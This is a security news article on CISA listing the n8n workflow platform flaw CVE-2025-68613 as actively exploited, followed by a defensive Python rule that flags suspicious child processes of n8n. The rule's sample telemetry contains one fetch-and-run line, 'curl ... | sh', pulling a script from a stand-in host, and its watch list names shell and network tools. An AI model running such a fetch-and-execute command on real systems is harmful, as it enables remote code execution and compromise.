The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution vulnerability in the n8n workflow automation platform to its Known Exploited Vulnerabilities (KEV) catalog, citing confirmed active exploitation by threat actors including the Zerobot botnet.
Background
n8n is a widely deployed open-source workflow automation platform used by enterprises and development teams to orchestrate integrations across cloud services, internal APIs, and third-party SaaS applications. According to Resecurity, the platform supports over 400 integrations to third-party solutions, positioning it as a central orchestration layer in many enterprise environments. That connectivity, while operationally valuable, means a compromised n8n instance can serve as a launchpad for lateral movement into adjacent systems.
CVE-2025-68613, carrying a CVSS score of 9.9, was first disclosed in an n8n security advisory on December 19, 2025. The flaw resides in the platform's server-side expression evaluation engine. Exploitation requires authentication, but no privileges beyond those needed to create or edit workflows, a permission level commonly granted to developers, DevOps engineers, and integration partners. According to Orca Security, attackers embed malicious JavaScript expressions in workflow definitions that escape the intended sandbox and execute arbitrary code with the privileges of the n8n process.
Details
CISA added CVE-2025-68613 to its KEV catalog on March 11, 2026, setting a remediation deadline of March 25, 2026, for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive BOD 22-01. CVE-2025-68613 is the first n8n vulnerability to be placed in the KEV catalog, according to The Hacker News.
Intel 471 researchers identified the first confirmed in-the-wild exploitation in mid-January 2026; the activity was detected by Akamai's security intelligence and response team, which observed the Zerobot botnet, a Mirai-based botnet that typically targets IoT devices, using CVE-2025-68613 to compromise n8n instances. Intel 471's Vulnerability Intelligence team also observed a publicly available Metasploit module for CVE-2025-68613, indicating the vulnerability has been weaponized and productized. The firm additionally noted that "multiple threat actors, including a possible ransomware operator," shared links to a working exploit.
The exposure surface remains substantial: Intel 471 observed 71,537 exposed n8n instances worldwide as of March 16, 2026. The authentication that CVE-2025-68613 nominally requires can also be bypassed by chaining it with a second critical flaw. CVE-2026-21858, dubbed "Ni8mare" by its finders at Cyera, carries the maximum CVSS score of 10.0 and allows unauthenticated file read through improper webhook request handling, according to Rapid7. An attacker who uses the unauthenticated file read to forge an administrator session token can then trigger the authenticated RCE without ever holding valid credentials.
Researchers have identified five CVEs in the n8n exploit chain. Beyond CVE-2025-68613 and CVE-2026-21858, the chain includes CVE-2025-68668 (arbitrary command execution via the Pyodide Python code node, CVSS 9.9), CVE-2025-68697 (arbitrary file read/write in legacy JavaScript execution mode), and CVE-2026-21877 (RCE via arbitrary file write, CVSS 9.9), per Rapid7's analysis. Pillar Security subsequently disclosed CVE-2026-27577 (CVSS 9.4), a further weakness in the workflow expression evaluation system found in the wake of CVE-2025-68613.
Upon successful exploitation, attackers can execute arbitrary OS commands; extract API keys, OAuth tokens, and database credentials stored in workflow environment variables; write backdoors to disk; and pivot laterally into connected databases, CI/CD pipelines, and cloud infrastructure, according to SecureLayer7. CISA's KEV entry describes the core flaw as an "improper control of dynamically managed code resources vulnerability in its workflow expression evaluation system".
A significant share of exposed deployments are self-hosted instances that lag in patch adoption. Self-hosted n8n deployments installed via Docker or on virtual machines frequently lack consistent patch pipelines, and operational hesitation, including concern over breaking production workflows, has slowed remediation, according to Vulert's analysis of the exposure data. n8n's cloud customers received automatic updates shortly after the patches were released.
Outlook
n8n patched CVE-2025-68613 in versions 1.120.4, 1.121.1, and 1.122.0, released in December 2025. Security teams managing self-hosted deployments should treat workflow automation infrastructure with the same patch urgency as perimeter systems. Recommended mitigations from CISA, Rapid7, and Resecurity include:
- Restricting workflow creation and editing permissions to a minimal set of trusted users
- Enforcing multi-factor authentication and single sign-on (SSO) across n8n instances
- Deploying the platform in network-isolated segments with least-privilege OS accounts
- Enabling runtime monitoring for anomalous child process spawns, particularly commands such as id, whoami, wget, and curl, originating from the n8n process
Intel 471 recommends organizations also integrate available Sigma detection rules and Nuclei templates to identify exploitation attempts across their environments.
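The child-process monitoring recommended above is straightforward to express as a detection rule. The following is an added example, not code from the article or from n8n, Intel 471, or any of the vendors cited. It assumes process-creation telemetry has already been normalized to JSON lines with Sysmon-like fields (ts, host, pid, parent_pid, image, cmdline, parent_image, parent_cmdline); how those events are collected (auditd, eBPF, Sysmon for Linux) is left to the deployment. The rule fires when the n8n server process, which normally runs under node, spawns one of the commands named in the mitigation guidance, and it also looks inside `sh -c '...'` wrappers, since a payload fetched with curl is usually piped straight into a shell. The sample events are constructed, and the shell-wrapper list is a hypothetical choice for this example.

```python
"""Flag child processes spawned by an n8n server that match the commands
called out in the mitigation guidance (id, whoami, wget, curl), including
the common case where they are wrapped in `sh -c '...'`.

Assumptions (not from the article): process-creation events arrive as JSON
lines with the Sysmon-like fields ts, host, pid, parent_pid, image, cmdline,
parent_image, parent_cmdline."""
import json
import re
import shlex

# Commands named in the mitigation guidance; extend for your environment.
SUSPICIOUS_BINARIES = {"id", "whoami", "wget", "curl"}
# Shell wrappers whose arguments are inspected for the commands above
# (hypothetical choice for this example).
SHELL_WRAPPERS = {"sh", "bash", "dash"}
# n8n normally runs under node, e.g. `node .../node_modules/n8n/bin/n8n start`.
N8N_CMDLINE = re.compile(r"\bn8n\b")


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def is_n8n_parent(event: dict) -> bool:
    """True when the spawning process is the n8n server itself."""
    base = basename(event.get("parent_image", ""))
    if base == "n8n":
        return True
    return base in ("node", "nodejs") and bool(
        N8N_CMDLINE.search(event.get("parent_cmdline", ""))
    )


def suspicious_commands(image: str, cmdline: str) -> set:
    """Return the watched commands a process runs, directly or via a shell -c wrapper."""
    found = set()
    base = basename(image)
    if base in SUSPICIOUS_BINARIES:
        found.add(base)
    if base in SHELL_WRAPPERS:
        try:
            tokens = shlex.split(cmdline)
        except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
            tokens = cmdline.split()
        for tok in tokens:
            # The script passed to -c arrives as a single token; split it on
            # shell separators so `curl ... | sh` still yields `curl`.
            for word in re.split(r"[\s;|&()<>]+", tok):
                if basename(word) in SUSPICIOUS_BINARIES:
                    found.add(basename(word))
    return found


def detect(events):
    """Return one alert per process-creation event that matches the rule."""
    alerts = []
    for ev in events:
        if not is_n8n_parent(ev):
            continue
        cmds = suspicious_commands(ev.get("image", ""), ev.get("cmdline", ""))
        if cmds:
            alerts.append({
                "ts": ev.get("ts"), "host": ev.get("host"),
                "pid": ev.get("pid"), "parent_pid": ev.get("parent_pid"),
                "commands": sorted(cmds), "cmdline": ev.get("cmdline"),
            })
    return alerts


def detect_from_jsonl(text: str):
    return detect(json.loads(line) for line in text.splitlines() if line.strip())


# Constructed sample telemetry (not real data); 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = """
{"ts":"2026-03-16T09:12:01Z","host":"n8n-prod-01","pid":4102,"parent_pid":4001,"image":"/usr/bin/id","cmdline":"id","parent_image":"/usr/local/bin/node","parent_cmdline":"node /usr/local/lib/node_modules/n8n/bin/n8n start"}
{"ts":"2026-03-16T09:12:03Z","host":"n8n-prod-01","pid":4109,"parent_pid":4001,"image":"/usr/bin/git","cmdline":"git pull","parent_image":"/usr/local/bin/node","parent_cmdline":"node /usr/local/lib/node_modules/n8n/bin/n8n start"}
{"ts":"2026-03-16T09:12:05Z","host":"n8n-prod-01","pid":4117,"parent_pid":4001,"image":"/bin/sh","cmdline":"/bin/sh -c 'curl -s http://198.51.100.7/x.sh | sh'","parent_image":"/usr/local/bin/node","parent_cmdline":"node /usr/local/lib/node_modules/n8n/bin/n8n start"}
{"ts":"2026-03-16T09:13:10Z","host":"n8n-prod-01","pid":5001,"parent_pid":980,"image":"/usr/bin/whoami","cmdline":"whoami","parent_image":"/bin/bash","parent_cmdline":"-bash"}
{"ts":"2026-03-16T09:15:00Z","host":"n8n-prod-01","pid":5010,"parent_pid":711,"image":"/usr/bin/curl","cmdline":"curl -fsS https://updates.example.com/ping","parent_image":"/usr/sbin/cron","parent_cmdline":"/usr/sbin/cron -f"}
{"ts":"2026-03-16T09:20:44Z","host":"n8n-prod-02","pid":4130,"parent_pid":3900,"image":"/usr/bin/whoami","cmdline":"whoami","parent_image":"/usr/local/bin/n8n","parent_cmdline":"n8n start"}
"""

if __name__ == "__main__":
    for alert in detect_from_jsonl(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Run against the sample, the rule raises three alerts (the direct id and whoami spawns and the shell-wrapped curl) and stays quiet on the git pull from n8n and on the whoami and curl spawned by an interactive shell and by cron, which is the point of keying on the parent rather than on the command alone. The same parent/child logic maps directly onto a Sigma process_creation rule, with ParentImage and ParentCommandLine selecting the n8n process and Image selecting the watched binaries.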
